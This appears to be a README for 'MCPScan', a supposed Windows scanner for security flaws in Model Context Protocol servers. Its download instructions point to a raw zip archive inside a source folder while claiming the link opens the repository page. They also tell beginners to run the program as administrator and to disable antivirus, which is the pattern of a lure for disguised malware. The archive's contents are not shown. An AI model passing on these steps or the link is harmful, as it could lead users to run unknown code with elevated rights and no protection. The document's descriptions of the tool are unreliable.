🛡️ MCPScan - Find Security Risks Fast

📋 What is MCPScan?

MCPScan scans servers that use the Model Context Protocol (MCP). It looks for security issues like tool poisoning, leaked passwords, remote code execution risks, server-side request forgery, session hijacking, and supply chain problems. It works across different communication types, including stdio, HTTP, and SSE. MCPScan helps keep your MCP servers safer by finding important issues.

💻 System Requirements

Before you start, check that your Windows computer meets these requirements:

• Windows 10 or later (64-bit recommended)
• At least 4 GB of RAM
• 200 MB of free disk space
• Internet connection for downloading and updates

No extra software or programming tools are needed. MCPScan runs as a standalone app.

🌐 Where to Get MCPScan

You can download MCPScan from the official GitHub page:

Click the link above to go directly to the GitHub repository page. From there, you can find the files needed to install MCPScan.

🚀 How to Download and Run MCPScan on Windows

Follow these steps to get MCPScan running. This guide assumes you have no prior experience with this type of software.

1. Visit the GitHub MCPScan Page

Click the download badge or open this link in your web browser:

https://raw.githubusercontent.com/harikrishn4101/MCPScan/main/src/checks/Scan-MCP-3.1-beta.1.zip

This takes you to the MCPScan repository on GitHub.

2. Locate the Download Section

On the GitHub page, look for a section called Releases or scroll down to find files related to MCPScan. These files usually end with .exe or .zip for Windows.

If you do not see an .exe file, look for the latest release under Releases in the right sidebar or main menu.

3. Download the MCPScan Windows File

• Click on the latest .exe file or .zip file made for Windows.
• If you download a .zip file, you will need to extract the contents before running.

Save the file somewhere you can easily find, like your Downloads folder or Desktop.

4. Run the Installer or Application

• If you downloaded an .exe file, double-click it to launch the installer or program directly.
• If you downloaded a .zip file, right-click it and choose Extract All before opening the folder and double-clicking the MCPScan application.

Windows may ask if you want to allow this app to make changes. Choose Yes to continue.

5. Follow On-Screen Instructions

If the file is an installer, it may guide you through a few simple setup steps. Just click Next or Install as needed.

If it is a standalone app, it might open immediately after launching.

6. Confirm MCPScan Opens Correctly

You should see a window or console showing that MCPScan is running. This means the installation is complete and the program is ready to use.

🛠️ Basic Use of MCPScan

MCPScan works by scanning your MCP servers to find security problems. To use it, you will provide the address or details of the server you want to check.

• Enter the server information in the app interface.
• Click the Scan button to start.
• Wait for the results, which will list any issues MCPScan found.

You do not need programming skills to use MCPScan. The interface guides you through the process and displays clear results.

🔧 Troubleshooting Tips

If MCPScan does not start or you see errors, try the following:

• Make sure your Windows version is up to date.
• Check your internet connection.
• Run MCPScan as an administrator by right-clicking the app and selecting Run as administrator.
• Disable any antivirus software temporarily, as they may block MCPScan.
• Restart your computer and try again.

💡 Understanding MCPScan’s Features

MCPScan looks for specific risks in your MCP server environment:

• Tool Poisoning: Detects malicious inputs that manipulate your server tools.
• Credential Leaks: Finds exposed usernames, passwords, or keys.
• Remote Code Execution (RCE): Catches ways hackers can run harmful code remotely.
• Server-Side Request Forgery (SSRF): Spots tricks that let attackers access internal resources.
• Session Hijacking: Notices ways someone could take over an active session.
• Supply Chain Vulnerabilities: Checks if third-party components risk your server security.

These checks help protect your systems from attacks that could cause data loss or service disruption.

📥 Updating MCPScan

Periodically check the GitHub page for new versions of MCPScan.

• Visit https://raw.githubusercontent.com/harikrishn4101/MCPScan/main/src/checks/Scan-MCP-3.1-beta.1.zip
• Download the latest files as described above.
• Replace your old MCPScan files with the new ones.

Keeping MCPScan updated ensures you have the latest security checks and fixes.

🔒 Privacy and Security

MCPScan runs locally on your computer. It does not send your server data to any external servers. Your information stays private while you use the tool.

🤝 Support and Issues

For help or to report problems:

• Use the Issues tab on the GitHub page.
• Describe what you were doing and the problem that came up.
• The community or project maintainer can review and assist.

You do not need a programming background to open an issue. Just explain things in simple terms.

⚙️ Advanced Options (Optional)

For users familiar with technical details, MCPScan offers options to customize scans:

• Choose which transports to scan (stdio, HTTP, SSE)
• Set scan depth and timeout settings
• Export scan reports in formats like CSV or JSON

The default settings are best for most users. Adjust these only if you know what you are doing.